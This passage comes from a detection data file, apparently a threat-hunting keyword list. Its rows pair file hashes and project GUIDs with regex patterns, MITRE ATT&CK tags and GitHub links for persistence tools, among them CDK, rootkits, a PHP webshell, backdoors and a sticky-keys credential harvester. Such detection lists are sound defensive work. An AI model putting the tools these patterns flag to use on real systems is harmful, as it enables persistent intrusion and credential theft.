618*1c8de7031ee8dbf83ffde0f1d6401dbc9d95059c984290b115bd58c20b86e8a6*.{0,1000}1c8de7031ee8dbf83ffde0f1d6401dbc9d95059c984290b115bd58c20b86e8a6.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22763
619*1d2e4fa684a99e31479bcc0e5e14aa7f3c56cce3de71028241a9745c67ebf034*.{0,1000}1d2e4fa684a99e31479bcc0e5e14aa7f3c56cce3de71028241a9745c67ebf034.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22806
620*1d533c26001b29f11e09de0c350cab64faef97ea49a41f579d01b9ae74d2a0e9*.{0,1000}1d533c26001b29f11e09de0c350cab64faef97ea49a41f579d01b9ae74d2a0e9.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22816
621*1d9b4121c2dbc17a4db31341da2097cd430a61201c57185a42fb687f22f704eb*.{0,1000}1d9b4121c2dbc17a4db31341da2097cd430a61201c57185a42fb687f22f704eb.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit10#filehashN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z22838
622*1db1f717560d1c53a8ec668a80aad419da22a84b1705f7dfbcc3075634634f64*.{0,1000}1db1f717560d1c53a8ec668a80aad419da22a84b1705f7dfbcc3075634634f64.{0,1000}offensive_tool_keywordSharpPersistSDA Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machinesT1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/cybersectroll/SharpPersistSD10#filehashN/A10187122024-05-15T14:55:14Z2024-05-13T15:11:12Z22846
623*1e7a48d3a266ff3a1521da0804858af56093f9c736c06be2bc6b46502a776d5d*.{0,1000}1e7a48d3a266ff3a1521da0804858af56093f9c736c06be2bc6b46502a776d5d.{0,1000}offensive_tool_keywordwso-webshellwso php webshellT1100 - T1027 - T1059TA0003 N/AEMBER BEAR - SandwormPersistencehttps://github.com/mIcHyAmRaNe/wso-webshell10#filehashN/A1043762112024-07-08T04:54:36Z2017-05-04T23:34:02Z22903
624*1e82c733ecbf30e06bfa200e327fad167e79a55854a198f92afa2fa7d0f9337f*.{0,1000}1e82c733ecbf30e06bfa200e327fad167e79a55854a198f92afa2fa7d0f9337f.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22905
625*1ff183ed7b15612ef77d444187d44d2e1d76df09fa1762c24c54ab45440c77b9*.{0,1000}1ff183ed7b15612ef77d444187d44d2e1d76df09fa1762c24c54ab45440c77b9.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23015
626*2033380cf345c3c743aefffe9e261457b23ececdb6ddd6ffe21436e6f71a8696*.{0,1000}2033380cf345c3c743aefffe9e261457b23ececdb6ddd6ffe21436e6f71a8696.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10#filehashN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z23045
627*2058e248325daeca20f053bfeba403667aa6dd0b70b959963076ae8997c0cbe7*.{0,1000}2058e248325daeca20f053bfeba403667aa6dd0b70b959963076ae8997c0cbe7.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23059
628*20f2e5e7e74953d37c5986b751d8d2e0cdd21d2275dfdfc21a5f4f8b4a37776f*.{0,1000}20f2e5e7e74953d37c5986b751d8d2e0cdd21d2275dfdfc21a5f4f8b4a37776f.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23100
629*21582bab4103dda43821915b76e96870431e1f2f59bc0135ba4700008abdaa32*.{0,1000}21582bab4103dda43821915b76e96870431e1f2f59bc0135ba4700008abdaa32.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23130
630*22020898-6F0D-4D71-B14D-CB5897C5A6AA*.{0,1000}22020898\-6F0D\-4D71\-B14D\-CB5897C5A6AA.{0,1000}offensive_tool_keywordCreateServiceCreating a persistent serviceT1543.003 - T1547.001 - T1050TA0003N/AN/APersistencehttps://github.com/uknowsec/CreateService10#GUIDprojectN/A42105272021-04-26T06:43:12Z2020-09-23T05:03:52Z23172
631*223279bb628165de88609c81444f4a9bf9aac6f921ea155ac427a47d13b49084*.{0,1000}223279bb628165de88609c81444f4a9bf9aac6f921ea155ac427a47d13b49084.{0,1000}offensive_tool_keywordShimDBShim database persistence (Fin7 TTP)T1546.011TA0003N/AN/APersistencehttps://github.com/jackson5sec/ShimDB10#filehashN/A9137102020-02-25T09:41:53Z2018-06-21T00:38:10Z23192
632*225ae3f948ca67c0f37ad69a5ce542c27c370993806599aeb927079bf8553acb*.{0,1000}225ae3f948ca67c0f37ad69a5ce542c27c370993806599aeb927079bf8553acb.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23209
633*233d785a077c50ad57de73da20e8696258a99edbc6961b92530dac81aede0bcb*.{0,1000}233d785a077c50ad57de73da20e8696258a99edbc6961b92530dac81aede0bcb.{0,1000}offensive_tool_keywordRID-HijackingWindows RID Hijacking persistence techniqueT1174TA0003N/AN/APersistencehttps://github.com/r4wd3r/RID-Hijacking10#filehashN/A92174432024-11-20T01:43:01Z2018-07-14T18:48:51Z23271
634*238111f4c27f2bad38c5b5eac85aacf4305baaa7c854911e3cbffe7a58cc9964*.{0,1000}238111f4c27f2bad38c5b5eac85aacf4305baaa7c854911e3cbffe7a58cc9964.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk10#filehashN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z23288
635*242a11999f0c5b776400f2462854ef1d07101bd1085e3b29c9b7ba825c93a3fb*.{0,1000}242a11999f0c5b776400f2462854ef1d07101bd1085e3b29c9b7ba825c93a3fb.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23333
636*24aae23bcf8b0a513988d69b1526eebd791007136a1faf08ea1df5a8d3884e50*.{0,1000}24aae23bcf8b0a513988d69b1526eebd791007136a1faf08ea1df5a8d3884e50.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72710#filehashN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z23358
637*2518c6ab5e78e0f644a5c406d84778eb45991564ba136c266d9696fc6996e8ef*.{0,1000}2518c6ab5e78e0f644a5c406d84778eb45991564ba136c266d9696fc6996e8ef.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23393
638*254cf55fb776afbcf5ff93f9647303be1f8bee48bcb78f138881e4dc17c34b81*.{0,1000}254cf55fb776afbcf5ff93f9647303be1f8bee48bcb78f138881e4dc17c34b81.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23411
639*259c9c57a74382b07c0a630b3094489b3aca263504b4fda79d3c20027e2a74fa*.{0,1000}259c9c57a74382b07c0a630b3094489b3aca263504b4fda79d3c20027e2a74fa.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23435
640*2627fc45ff4accc08085a2e95ccaedf3ec4df6ddecb3339b747a4ca322e6d69b*.{0,1000}2627fc45ff4accc08085a2e95ccaedf3ec4df6ddecb3339b747a4ca322e6d69b.{0,1000}offensive_tool_keywordCreateServiceCreating a persistent serviceT1543.003 - T1547.001 - T1050TA0003N/AN/APersistencehttps://github.com/uknowsec/CreateService10#filehashN/A42105272021-04-26T06:43:12Z2020-09-23T05:03:52Z23470
641*2661F29C-69F5-4010-9198-A418C061DD7C*.{0,1000}2661F29C\-69F5\-4010\-9198\-A418C061DD7C.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez10#GUIDprojectN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z23481
642*26edf5820094951dd18e20e86b1151d7113f1e17b64f1d3817d4995885559850*.{0,1000}26edf5820094951dd18e20e86b1151d7113f1e17b64f1d3817d4995885559850.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10#filehashN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z23532
643*27d7590cf6e7386f9df2777e5f2b1e3473fe990182b2ad8bf31a33b0f5436be4*.{0,1000}27d7590cf6e7386f9df2777e5f2b1e3473fe990182b2ad8bf31a33b0f5436be4.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z23585
644*27F85701-FD37-4D18-A107-20E914F8E779*.{0,1000}27F85701\-FD37\-4D18\-A107\-20E914F8E779.{0,1000}offensive_tool_keywordSharpEventPersistPersistence by writing/reading shellcode from Event LogT1055 - T1070.001 - T1547.001TA0003 - TA0005N/AN/APersistencehttps://github.com/improsec/SharpEventPersist10#GUIDprojectN/A1010371502022-05-27T14:52:02Z2022-05-20T14:52:56Z23598
645*28009247ff5f8ee93dcf3fa06e60eb43374eec61f816feb61081e2d53f4806be*.{0,1000}28009247ff5f8ee93dcf3fa06e60eb43374eec61f816feb61081e2d53f4806be.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23600
646*28110f190791aa5b4ca3f0c36dfc39cda8716f165789599de34c8578a70357fd*.{0,1000}28110f190791aa5b4ca3f0c36dfc39cda8716f165789599de34c8578a70357fd.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23603
647*295eb7f2a9039a3ef9552eda6ddeb1d442810621de623fd08a010514fe588d35*.{0,1000}295eb7f2a9039a3ef9552eda6ddeb1d442810621de623fd08a010514fe588d35.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23689
648*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*.{0,1000}2963C954\-7B1E\-47F5\-B4FA\-2FC1F0D56AEA.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10#GUIDprojectN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z23692
649*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*.{0,1000}2963C954\-7B1E\-47F5\-B4FA\-2FC1F0D56AEA.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10#GUIDprojectN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z23693
650*2a707260991123cf39ed723eaff4bf99db683ad35f58ad43c75c8fe2a5e9a4e7*.{0,1000}2a707260991123cf39ed723eaff4bf99db683ad35f58ad43c75c8fe2a5e9a4e7.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23745
651*2b92652d4909d39e12fc9320188f9e834b82f80d3aba92dea4267608f3543861*.{0,1000}2b92652d4909d39e12fc9320188f9e834b82f80d3aba92dea4267608f3543861.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23820
652*2bb27f59beed6f28e048b581de811a1443aa880dc8172f3156146c4cf782b68b*.{0,1000}2bb27f59beed6f28e048b581de811a1443aa880dc8172f3156146c4cf782b68b.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23831
653*2c757f0065c167e633318ff8d43cb85cf936eae2db224f4e066098f4a8cb324a*.{0,1000}2c757f0065c167e633318ff8d43cb85cf936eae2db224f4e066098f4a8cb324a.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23884
654*2c901d5da52c1766eb638b8d1b35a276121f0fb2a7156cb591b4f7ca054c1ed7*.{0,1000}2c901d5da52c1766eb638b8d1b35a276121f0fb2a7156cb591b4f7ca054c1ed7.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23889
655*2d65a1cab58434497155118ca19bd1202900532375a4d1356a0e60463437f924*.{0,1000}2d65a1cab58434497155118ca19bd1202900532375a4d1356a0e60463437f924.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z23939
656*2D6FDD44-39B1-4FF8-8AE0-60A6B0979F5F*.{0,1000}2D6FDD44\-39B1\-4FF8\-8AE0\-60A6B0979F5F.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#GUIDprojectN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z23942
657*2dd16e2f18bd45ff80eb56a524d3af4e87f55054fdb3ada3d2a097824b6487ac*.{0,1000}2dd16e2f18bd45ff80eb56a524d3af4e87f55054fdb3ada3d2a097824b6487ac.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z23964
658*2e7b0f4d6b446760a2899fcc2e854850014b3ce0826291913d3d3c160ed06191*.{0,1000}2e7b0f4d6b446760a2899fcc2e854850014b3ce0826291913d3d3c160ed06191.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10#filehashN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z24013
659*2eb30e2abc71fadaee5980bd89a8e4a2c95bcc5d60857a3c13b006c186307e8e*.{0,1000}2eb30e2abc71fadaee5980bd89a8e4a2c95bcc5d60857a3c13b006c186307e8e.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24037
660*313d2e2dad28703bf74b58c71131036e978667067d0cf77217435f10ff50a7df*.{0,1000}313d2e2dad28703bf74b58c71131036e978667067d0cf77217435f10ff50a7df.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24241
661*317459a7d2933c3bb095b5c4d188c83ce6dbed8dd9f282cd3406c9f364a04363*.{0,1000}317459a7d2933c3bb095b5c4d188c83ce6dbed8dd9f282cd3406c9f364a04363.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z24258
662*31b9c5ce299981849c4ec0f90e6dac5a7b894c654eab1c3db4099744a5594e80*.{0,1000}31b9c5ce299981849c4ec0f90e6dac5a7b894c654eab1c3db4099744a5594e80.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24282
663*32cd84b8c8e4df09df5aaf0c310a954d18b2cc96aaea2ca524b79f381afd3e55*.{0,1000}32cd84b8c8e4df09df5aaf0c310a954d18b2cc96aaea2ca524b79f381afd3e55.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24351
664*32d12ed0ff8db1c95d1ee507561ee0db4c36200277a2bc4cd1b643e385ff5ebe*.{0,1000}32d12ed0ff8db1c95d1ee507561ee0db4c36200277a2bc4cd1b643e385ff5ebe.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go10#filehashN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z24355
665*330253612d4c4a3791acfd82257d5a4c1e68ec989e0647abfa4baa560cf0a046*.{0,1000}330253612d4c4a3791acfd82257d5a4c1e68ec989e0647abfa4baa560cf0a046.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24370
666*336b7dca10b75274a81c04cdba1989781ad742e968ebd41e5f901e66f106204c*.{0,1000}336b7dca10b75274a81c04cdba1989781ad742e968ebd41e5f901e66f106204c.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24404
667*347e7990aad2244990071b8b5648aeb675a7792b742ebbc08035c80c916702a4*.{0,1000}347e7990aad2244990071b8b5648aeb675a7792b742ebbc08035c80c916702a4.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24479
668*350189c879eb3d936a434927b1fa41d353d2ebdbc6589e9efa29ea5e05329fe5*.{0,1000}350189c879eb3d936a434927b1fa41d353d2ebdbc6589e9efa29ea5e05329fe5.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24514
669*356bdd6cb7c92146fcee5812aba9eb101ff713ff67768bafd59b6f33a5d61eae*.{0,1000}356bdd6cb7c92146fcee5812aba9eb101ff713ff67768bafd59b6f33a5d61eae.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24537
670*35a4bba030e749de8667b0284982bd8d187a5ed9e1ced0b3c2e67136aa839cc7*.{0,1000}35a4bba030e749de8667b0284982bd8d187a5ed9e1ced0b3c2e67136aa839cc7.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24554
671*364fcacd8b55d7d54162849b620cd83e9f50ddb3c7c08478f391cce09449b452*.{0,1000}364fcacd8b55d7d54162849b620cd83e9f50ddb3c7c08478f391cce09449b452.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24591
672*36d4c4959f8472bd2473abfc906db3c54d83ee71228c3c133d8aca97cd016d15*.{0,1000}36d4c4959f8472bd2473abfc906db3c54d83ee71228c3c133d8aca97cd016d15.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24631
673*371226668baa95b330676a6268145ad25bfc28f59710f35fc1888aa6b70a74a4*.{0,1000}371226668baa95b330676a6268145ad25bfc28f59710f35fc1888aa6b70a74a4.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24656
674*37bfb3819257d612a6dfed9954c9ba4a8da62f6967ec8221c802d7eb97723113*.{0,1000}37bfb3819257d612a6dfed9954c9ba4a8da62f6967ec8221c802d7eb97723113.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24697
675*381448682cb5ea5ff1bc8bfd3462e637da0445fc74fdb60e0de5e11d8c2dc90d*.{0,1000}381448682cb5ea5ff1bc8bfd3462e637da0445fc74fdb60e0de5e11d8c2dc90d.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24725
676*3897adf59fea097e79c69c0c4fa8961b9691232f382a52b7bee3ce234028da4e*.{0,1000}3897adf59fea097e79c69c0c4fa8961b9691232f382a52b7bee3ce234028da4e.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24766
677*39f6d556d0567606d5763e60fecafeb3e5d16afd986c05602c06d2486d8d72c2*.{0,1000}39f6d556d0567606d5763e60fecafeb3e5d16afd986c05602c06d2486d8d72c2.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z24854
